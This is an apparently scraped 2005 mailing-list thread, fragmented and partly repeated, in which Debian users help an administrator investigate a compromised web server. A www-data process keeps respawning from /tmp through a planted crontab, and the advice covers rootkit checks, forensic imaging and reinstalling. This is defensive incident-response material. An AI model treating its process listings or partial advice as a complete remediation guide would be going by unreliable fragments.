Nejc Novak ha scritto:
So, for now i killed this process, disabled the cronjob and killed web
server - there is now way the attacker is capable of coming back into
server or is there a chance that there is another backdoor installed
somewhere (chkrootkit doesn't find anything).
try also rk
Kernel root kits are very good at hiding themselves when they are
running.
Best way is to mount the had drive in another box as /mnt or something
and run chkrootkit over it and also md5sum known hacked binaries like ls
etc.
> OK :)
>
> So, for now i killed this process, disabled the cronjob an
OK :)
So, for now i killed this process, disabled the cronjob and killed web
server - there is now way the attacker is capable of coming back into
server or is there a chance that there is another backdoor installed
somewhere (chkrootkit doesn't find anything).
Nejc
Marcin Owsiany wrote:
Can you also define, what it does? Or what was the attacker capable of
doing with it?
Thanks..
Edward Faulkner wrote:
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
It's attempting to connect to two different hosts:
Never mind that second address... that's my DNS.
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
> On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote:
> > Can you get any information out of this cron file? I tried creating the
> > same exec that this file creats, but obiously i was doing sth wrong :)
>
> The crontab wri
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
> It's attempting to connect to two different hosts:
Never mind that second address... that's my DNS...
signature.asc
Description: Digital signature
On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote:
> Can you get any information out of this cron file? I tried creating the
> same exec that this file creats, but obiously i was doing sth wrong :)
The crontab writes out a binary file and executes it. I straced the
binary on a virtual m
Hi again!
I found out how the process is started. There was a file created -
/var/spool/cron/crontabs/www-data. I hope that its ok if i post it here
as attachment. The creation of file was 21.7.2005 23:55. I checked
apache logs for that time but there was nothing wierd to notice.
Can you get
Re: a compromised machine
Le 12989ième jour après Epoch,
Nejc Novak écrivait:
> i checked crontabs and i haven't found anything. but new processess
started
>
> www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00
> /tmp/dlciiqlno x
> www-data 6762 0.0 0.0 00 ?
Le 12989ième jour après Epoch,
Nejc Novak écrivait:
> i checked crontabs and i haven't found anything. but new processess started
>
> www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00
> /tmp/dlciiqlno x
> www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh]
>
> www-dat
In article <[EMAIL PROTECTED]> you wrote:
> I still haven't managed to find out how exactly this happened. And
> probably reinstall will be needed? What do you think?
Yes, reinstall on compromised hosts is always needed, however you should
make a image of the system for forensic, you dont want t
Reinstall seems the option left...with the added security features discussed
previously, monitoring the server closely after new installation. I would
do the new installation in a new hard disk, saving and afterwards,
installing the seemingly compromised hard disk, for a forensic analysis in
a mac
i checked crontabs and i haven't found anything. but new processess started
www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00
/tmp/dlciiqlno x
www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh]
www-data 6770 0.0 0.1 1624 608 ?S22:10 0:00 [bdflu
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote:
> that means, that the process was started at 17:31 today. So i checked
> I killed the process and webserver and at 19:31 the process again
> started with the same lines in syslog.
Check your crontabs (in various locations) and atq. It
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data 6059 0.0 0.1 1616 600 ?S17:31 0:00
/tmp/dlciiqlno x
that means, that the process was started at 17:31 today. So i checked
logs (all virtual serv
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.
Yes ..
> Examples of hacks on our servers:
>
Christoph Haas wrote:
> On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.
>
> If your server is important you should consider reinstalling.
I'd urge you to spend the time
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since i don't have a lot
> of experiencei with these things, i beg you for your help.
>
> Information i have gathered together till now are the following. Server
> is runnin latest debia
Hi!
I think one of my servers has been compromised. Since i don't have a lot
of experiencei with these things, i beg you for your help.
Information i have gathered together till now are the following. Server
is runnin latest debian stable, sarge.
There was heavy traffic on the server and ps
19 matches
Mail list logo